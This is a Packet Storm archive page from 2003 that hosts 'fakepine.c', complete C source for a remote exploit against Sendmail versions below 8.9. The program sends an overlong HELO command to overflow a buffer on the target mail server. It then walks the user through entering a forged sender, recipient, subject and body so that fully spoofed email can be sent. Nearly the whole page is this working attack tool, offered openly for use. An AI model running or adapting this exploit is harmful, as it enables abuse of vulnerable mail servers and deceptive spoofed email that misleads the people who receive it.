exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

fakepine.c

fakepine.c
Posted Jul 20, 2003
Authored by r3b00t | Site r3b00t.tx.pl

Remote exploit for Sendmail versions below 8.9 that makes use of the buffer overflow in HELO to send completely spoofed emails.

tags | exploit, remote, overflow, spoof
SHA-256 | 3d6881cde3b31dc842c49104042ab24e0e162e20e9e27f80f3a49df9dceababe

fakepine.c

Change Mirror Download
/* fakepine.c for sendmail <8.9 by R3B00T <r3b00t@go2.pl> */
/* ------------------------------------------------------ */
/* this simple exploit overflows buffer for HELO command */
/* so you can send 100% fakemail */
/* usage: ./fakepine <smtpserver> */
/* compile: gcc -Wall -O2 -o fakepine fakepine.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>

int sock = 0;

void get_response(void);
void say(char *it);

int main(int argc, char* argv[]) {
struct hostent *hp;
struct sockaddr_in addr;
char req[4096];
char mail_from[64];
char rcpt_to[64];
char subject[64];
int i;

printf("fakepine.c for sendmail <8.9 by R3B00T <r3b00t@go2.pl>\n");

if (argc<2) {
printf("usage: %s <smtpserver>\n", argv[0]);
exit(0);
}

hp=gethostbyname(argv[1]);

if (!hp) {
printf("can't resolve %s\n", argv[1]);
exit(0);
}

bzero((char *)&addr, sizeof(addr));

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("can't create socket\n");
exit(0);
}

bcopy(hp->h_addr, (char *)&addr.sin_addr, hp->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(25);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) {
printf("can't connect to %s\n", argv[1]);
close(sock);
exit(0);
}

get_response();

sprintf(req, "HELO ");
for (i=0;i<1100;i++) strcat(req, "x");
strcat(req, "\r\n");
say(req);

bzero(req, sizeof(req));
printf("mail from: ");
fgets(mail_from, sizeof(mail_from), stdin);
mail_from[strlen(mail_from)-1]='\0';
sprintf(req, "MAIL FROM:<%s>\r\n", mail_from);
say(req);

bzero(req, sizeof(req));
printf("rcpt to: ");
fgets(rcpt_to, sizeof(rcpt_to), stdin);
rcpt_to[strlen(rcpt_to)-1]='\0';
sprintf(req, "RCPT TO:<%s>\r\n", rcpt_to);
say(req);

say("DATA\r\n");

bzero(req, sizeof(req));
printf("Subject: ");
fgets(subject, sizeof(subject), stdin);
subject[strlen(subject)-1]='\0';
sprintf(req, "Subject: %s\r\n", subject);
send(sock, req, strlen(req), 0);

do {
bzero(req, sizeof(req));
fgets(req, sizeof(req), stdin);
req[strlen(req)-1]='\0';
strcat(req, "\r\n");
if (strcmp(req, ".\r\n")==0)
send(sock, "\r\n.\r\n", 5, 0);
else
send(sock, req, strlen(req), 0);
} while (strcmp(req, ".\r\n")!=0);

fflush(stdout);

say("QUIT\r\n");

shutdown(sock, 2);
close(sock);

return 0;
}

void get_response(void) {
char buff[64];
recv(sock, buff, sizeof(buff), 0);
if (buff[0]!='2' && buff[0]!='3') printf("%s", buff);
}

void say(char *it) {
send(sock, it, strlen(it), 0);
get_response();
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close